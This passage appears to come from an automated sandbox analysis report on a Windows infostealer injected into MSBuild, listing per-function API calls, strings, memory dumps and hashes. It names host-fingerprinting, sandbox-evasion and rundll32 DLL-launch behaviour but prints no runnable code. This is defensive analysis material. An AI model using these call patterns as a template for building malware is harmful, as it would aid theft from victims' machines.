                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                                                                                                                                                      Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004010D0
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                                                                                                                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1859398019-0
                                                                                                                                                                                                                      • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                                                                                                                      • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                                                                                                                                                                      Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                        • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                      • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                      • API String ID: 2215929589-2108736111
                                                                                                                                                                                                                      • Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                                                                                                                      • Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98
                                                                                                                                                                                                                      Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 004116CE
                                                                                                                                                                                                                        • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                                                                                        • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                                                                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                                      • String ID: Unknown
                                                                                                                                                                                                                      • API String ID: 2781187439-1654365787
                                                                                                                                                                                                                      • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                                                                                                                      • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                                                                                                                                                                      Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041117A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                      • String ID: %d MB
                                                                                                                                                                                                                      • API String ID: 3644086013-2651807785
                                                                                                                                                                                                                      • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                                                                                                                      • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                                                                                                                                                                      Function 6C89C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C89C947
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C89C969
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C89C9A9
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C89C9C8
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C89C9E2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4191843772-0
                                                                                                                                                                                                                      • Opcode ID: 2976d8b1dc985e4ae3dba00e79a2e36a13b42b333a878e83da1cd3ddd02376ee
                                                                                                                                                                                                                      • Instruction ID: 0d5967831618143958b67c105cd35460608b90be2e37e7b088a69b647f20a8f4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2976d8b1dc985e4ae3dba00e79a2e36a13b42b333a878e83da1cd3ddd02376ee
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1521FC327452146BDB24AB6CCD84BAE73B9EB4A744F70091DF943A7B81DB716D00C794
                                                                                                                                                                                                                      Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                      • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1274457161-0
                                                                                                                                                                                                                      • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                                                                                                                      • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                                                                                                                                                                      Function 00410F51 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3466090806-0
                                                                                                                                                                                                                      • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                                                                                                                      • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                                                                                                                                                                                      Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                                                                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                                                                        • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2190030987.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                      • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                      • API String ID: 2929475105-1843082770
                                                                                                                                                                                                                      • Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                                                                                                                      • Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89
                                                                                                                                                                                                                      Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 00416DCD
                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
